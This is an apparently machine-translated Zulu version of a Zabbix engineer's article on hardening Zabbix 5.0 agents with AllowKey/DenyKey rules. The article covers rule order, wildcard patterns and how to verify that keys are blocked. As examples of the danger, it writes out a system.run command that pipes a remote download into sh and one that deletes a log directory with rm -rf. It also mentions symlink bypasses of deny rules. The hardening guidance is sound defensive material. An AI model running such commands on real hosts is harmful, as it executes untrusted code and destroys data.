🥇Ukusekelwa kwezinhlu ezimnyama nezimhlophe zamamethrikhi aseceleni komenzeli ku-Zabbix 5.0

Uhlu lokuvinjwa nokusekelwa kohlu olugunyaziwe lwamamethrikhi aseceleni komenzeli

Tikhon Uskov, Unjiniyela Wokuhlanganisa, Zabbix

Izinkinga zokuphepha kwedatha

I-Zabbix 5.0 inesici esisha esikuvumela ukuthi uthuthukise ukuphepha kumasistimu usebenzisa i-Zabbix Agent futhi ingene esikhundleni sepharamitha endala. Nika amandla i-RemoteCommands.

Ukuthuthukiswa kokuvikeleka kwamasistimu asekelwe kumenzeli kuvela eqinisweni lokuthi umenzeli angenza inombolo enkulu yezenzo ezingase zibe yingozi.

I-ejenti ingaqoqa cishe noma yiluphi ulwazi, okuhlanganisa ulwazi oluyimfihlo noma olungase lube yingozi, kumafayela okulungiselela, amafayela okungena, amafayela ephasiwedi, nanoma imaphi amanye amafayela.

Isibonelo, usebenzisa insiza yakwa-zabbix_get ungakwazi ukufinyelela uhlu lwabasebenzisi, izinkomba zasekhaya, amafayela ephasiwedi, njll.

Ukufinyelela idatha usebenzisa i-zabbix_get utility

QAPHELA. Idatha ingabuyiswa kuphela uma umenzeli efunde izimvume kufayela elihambisanayo. Kodwa, isibonelo, ifayela /etc/passwd/ ifundeka yibo bonke abasebenzisi.

I-ejenti ingaphinda ikhiphe imiyalo engaba yingozi. Isibonelo, ukhiye *system.run[]** ikuvumela ukuthi usebenzise noma yimiphi imiyalo yesilawuli kude kumanodi enethiwekhi, okuhlanganisa nemibhalo esebenzayo evela kusixhumi esibonakalayo sewebhu se-Zabbix esiphinde sisebenzise imiyalo ngasohlangothini lwe-ejenti.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

Ku-Linux, i-ejenti isebenza ngokuzenzakalelayo ngaphandle kwamalungelo empande, kuyilapho ku-Windows isebenza njengesevisi njengeSistimu futhi inokufinyelela okungavinjelwe ohlelweni lwefayela. Ngokufanelekile, uma zingekho izinguquko ezenziwayo kumapharamitha we-Zabbix Agent ngemva kokufakwa, i-ejenti iyakwazi ukufinyelela kurejista, isistimu yefayela futhi ingasayinda imibuzo ye-WMI.

Ezinguqulweni zangaphambili ipharamitha Nika amandla i-RemoteCommands=0 kuvunyelwe kuphela ukukhubaza amamethrikhi ngokhiye *system.run[]** kanye nemibhalo esebenzayo esuka kusixhumi esibonakalayo sewebhu, kodwa ibingekho indlela yokukhawulela ukufinyelela kumafayela ngamanye, ukuvumela noma ukukhubaza okhiye abangabodwana ababefakwe ne-ejenti, noma ukhawule ukusetshenziswa kwamapharamitha angawodwana.

Ukusebenzisa ipharamitha ye-EnableRemoteCommand ezinguqulweni zangaphambili ze-Zabbix

I-AllowKey/DenyKey

I-Zabbix 5.0 isiza ukuvikela ekufinyeleleni okungagunyaziwe okunjalo ngokuhlinzeka ngohlu olumhlophe nohlu lwabavinjiwe lokuvumela nokuphika amamethrikhi ohlangothini lomenzeli.

Ku-Zabbix 5.0 bonke okhiye, kuhlanganise *system.run[]** inikwe amandla, futhi izinketho ezimbili zokumisa i-ejenti zengeziwe:

VumelaKey= - amasheke avunyelwe;

I-DenyKey= - amasheke anqatshelwe;

iphi iphethini yegama elingukhiye elinamapharamitha asebenzisa ama-metacharacters (*).

Okhiye be-AllowKey kanye ne-DenyKey bakuvumela ukuthi uvumele noma unqabe amamethrikhi angawodwana ngokusekelwe kuphethini ethile. Ngokungafani namanye amapharamitha wokumisa, inombolo yemingcele ye-AllowKey/DenyKey ayikhawulelwe. Lokhu kukuvumela ukuthi uchaze ngokucacile ukuthi yini ngempela i-ejenti engayenza ohlelweni ngokudala isihlahla sokuhlola - okhiye abasebenzisekayo, lapho ukuhleleka okulotshwe khona kudlala indima ebaluleke kakhulu.

Ukulandelana kwemithetho

Imithetho ihlolwa ngendlela efakwe ngayo efayeleni lokucushwa. Ukhiye uyahlolwa ngokuya ngemithetho ngaphambi kokufana kokuqala, futhi ngokushesha nje lapho ukhiye wesici sedatha ufana nephethini, uyavunyelwa noma unqatshelwe. Ngemuva kwalokhu, izitobhi zokuhlola umthetho nezikhiye ezisele azinakwa.

Ngakho-ke, uma isici sifana nomthetho wokuvumela nowokwenqaba, umphumela uzoncika ekutheni imuphi umthetho ongowokuqala efayeleni lokumisa.

Imithetho emi-2 ehlukene enephethini efanayo nokhiye vfs.file.size[/tmp/file]

I-oda lokusebenzisa okhiye be-AllowKey/DenyKey:

imithetho eqondile,
imithetho ejwayelekile,
umthetho owenqabelayo.

Isibonelo, uma udinga ukufinyelela kumafayela kufolda ethile, kufanele uqale uvumele ukufinyelela kuwo, bese uphika konke okunye okungangeni phakathi kwezimvume ezimisiwe. Uma umthetho wokuphika usetshenziswa kuqala, ukufinyelela kufolda kuzonqatshelwa.

Ukulandelana okulungile

Uma udinga ukuvumela izinsiza ezingu-2 ukuthi zisebenze nge-*system.run[]**, futhi isimiso sokuphika sizocaciswa kuqala, izinsiza ngeke ziqaliswe, ngoba iphethini yokuqala izohlala ifana nanoma yimuphi ukhiye, futhi imithetho elandelayo izozitshwa.

Ukulandelana okungalungile

Amaphethini

Imithetho eyisisekelo

Iphethini isisho esinamakhadi asendle. I-metacharacter (*) ifana nanoma iyiphi inombolo yanoma yiziphi izinhlamvu endaweni ethile. Ama-metacharacts angasetshenziswa kokubili egameni elingukhiye kanye namapharamitha. Isibonelo, ungachaza ngokuqinile ipharamitha yokuqala ngombhalo, futhi ucacise elandelayo njenge-wildcard.

Amapharamitha kumelwe afakwe kubakaki abayisikwele [].

system.run[* - akulungile
vfs.file*.txt] - akulungile
vfs.file.*[*] - kwesokudla

Izibonelo zokusebenzisa i-wildcard.

Egameni elingukhiye nakupharamitha. Kulokhu, ukhiye awuhambisani nokhiye ofanayo ongaqukethe ipharamitha, njengoba kuphethini sibonise ukuthi sifuna ukuthola isiphetho esithile segama elingukhiye kanye nesethi ethile yamapharamitha.
Uma iphethini ingabasebenzisi abakaki abayisikwele, iphethini ivumela bonke okhiye abangaqukethe amapharamitha futhi iphika bonke okhiye abaqukethe ipharamitha eshiwo.
Uma ukhiye ubhalwe ngokugcwele futhi amapharamitha acaciswe njenge-wildcard, uzofana nanoma yimuphi ukhiye ofanayo nanoma yimaphi amapharamitha futhi ngeke afane nokhiye ngaphandle kwabakaki abayisikwele, okusho ukuthi uzovunyelwa noma wenqatshwe.

Imithetho yokugcwalisa amapharamitha.

Uma ukhiye onamapharamitha uhloselwe ukusetshenziswa, imingcele kufanele icaciswe kufayela lokumisa. Amapharamitha kufanele acaciswe njenge-metacharacter. Kuyadingeka ukwenqaba ngokucophelela ukufinyelela kunoma yiliphi ifayela futhi ucabangele ukuthi yiluphi ulwazi i-metric engalunikeza ngaphansi kokupela okuhlukene - okunamapharamitha nangaphandle kwawo.

Izici zokhiye wokubhala ngamapharamitha

Uma ukhiye ucaciswe namapharamitha, kodwa imingcele iyinketho futhi icaciswe njenge-metacharacter, ukhiye ongenawo amapharamitha uzoxazululwa. Isibonelo, uma ufuna ukukhubaza ukwamukela ulwazi mayelana nomthwalo ku-CPU futhi ucacise ukuthi ukhiye we-system.cpu.load[*] kufanele ucishwe, ungakhohlwa ukuthi ukhiye ngaphandle kwamapharamitha uzobuyisela inani lokulayisha elimaphakathi.

Imithetho yokugcwalisa amapharamitha

Amanothi

Yenza ngokwezifiso

Eminye imithetho ayikwazi ukushintshwa umsebenzisi, isibonelo, imithetho yokuthola noma imithetho yokubhalisa ngokuzenzakalela ye-ejenti. Imithetho ye-AllowKey/DenyKey ayithinti amapharamitha alandelayo:
-I-HostnameItem
- I-HostMetadataItem
- I-HostInterfaceItem

QAPHELA. Uma umlawuli ekhubaza ukhiye, uma ebuzwa, i-Zabbix ayinikezi ulwazi mayelana nokuthi kungani imethrikhi noma ukhiye uwela esigabeni 'AKUSEKELWE'. Ulwazi mayelana nokuvinjelwa ekusebenziseni imiyalo yesilawuli kude nalo aluboniswa kumafayela elogi yomenzeli. Lokhu kungenxa yezizathu zokuphepha, kodwa kungase kube nzima ukulungisa iphutha uma amamethrikhi ewela esigabeni esingasekelwe ngesizathu esithile..

Akufanele uthembele kunoma iyiphi i-oda elithile ukuze uxhume amafayela okumiswa angaphandle (isibonelo, ngokulandelana kwezinhlamvu).

Izinsiza Zolayini Womyalo

Ngemuva kokumisa imithetho, udinga ukuqinisekisa ukuthi konke kuhlelwe ngendlela efanele.

Ungasebenzisa enye yezinketho ezintathu:

Engeza imethrikhi ku-Zabbix.
Hlola nge zabbix_ejenti. I-ejenti ye-Zabbix enenketho -phrinta (-p) ibonisa bonke okhiye (abavunyelwe ngokuzenzakalelayo) ngaphandle kwalabo abangavunyelwe ukumisa. Futhi ngenketho -test (-t) ngoba ukhiye ongavunyelwe uzobuya 'Ukhiye wento ongasekelwe'.
Hlola nge zabbix_get. Isisetshenziswa zabbix_get ngenketho -k uzobuya'ZBX_NOTSUPPORTED: Imethrikhi engaziwa'.

Vumela noma unqabe

Unganqabela ukufinyelela kufayela futhi uqinisekise, isibonelo, usebenzisa insiza zabbix_getukuthi ukufinyelela ifayela kunqatshiwe.

QAPHELA. Izingcaphuno kupharamitha azinakwa.

Kulokhu, ukufinyelela kufayela elinjalo kungase kuvunyelwe ngendlela ehlukile. Isibonelo, uma i-symlink iholela kukho.

Kunconywa ukuthi uhlole izinketho ezihlukahlukene zokusebenzisa imithetho eshiwo, futhi ucabangele namathuba okugwema ukuvinjelwa.

Imibuzo Izimpendulo

Umbuzo wakho. Kungani kukhethwe iphethini eyinkimbinkimbi kangaka enolimi lwayo ukuchaza imithetho, izimvume kanye nokuvinjelwa? Kungani kungenakwenzeka ukusebenzisa, isibonelo, izinkulumo ezivamile ezisetshenziswa uZabbix?

Impendulo. Le yinkinga yokusebenza kwe-regex njengoba kuvame ukuba nomenzeli oyedwa kuphela futhi ihlola inani elikhulu lamamethrikhi. I-Regex iwumsebenzi onzima impela futhi asikwazi ukubheka izinkulungwane zamamethrikhi ngale ndlela. I-Wildcards - isisombululo esivamile, esisetshenziswa kabanzi futhi esilula.

Umbuzo wakho. Ingabe amafayela afakiwe awafakiwe ngokulandelana kwezinhlamvu?

Impendulo. Ngokwazi kwami, cishe akunakwenzeka ukubikezela indlela imithetho ezosetshenziswa ngayo uma usakaza imithetho kuwo wonke amafayela ahlukene. Ngincoma ukuqoqa yonke imithetho ye-AllowKey/DenyKey kwelinye Faka ifayela, ngoba iyasebenzisana, futhi kufaka phakathi leli fayela..

Umbuzo wakho. Ku-Zabbix 5.0 inketho 'Nika amandla i-RemoteCommands=' iyashoda efayeleni lokumisa, futhi i-AllowKey/DenyKey kuphela etholakalayo?

Phendula. Yebo kunjalo.

Спасибо за внимание!

Source: www.habr.com

Uhlu lokuvinjwa nokusekelwa kohlu olumhlophe lwamamethrikhi aseceleni komenzeli ku-Zabbix 5.0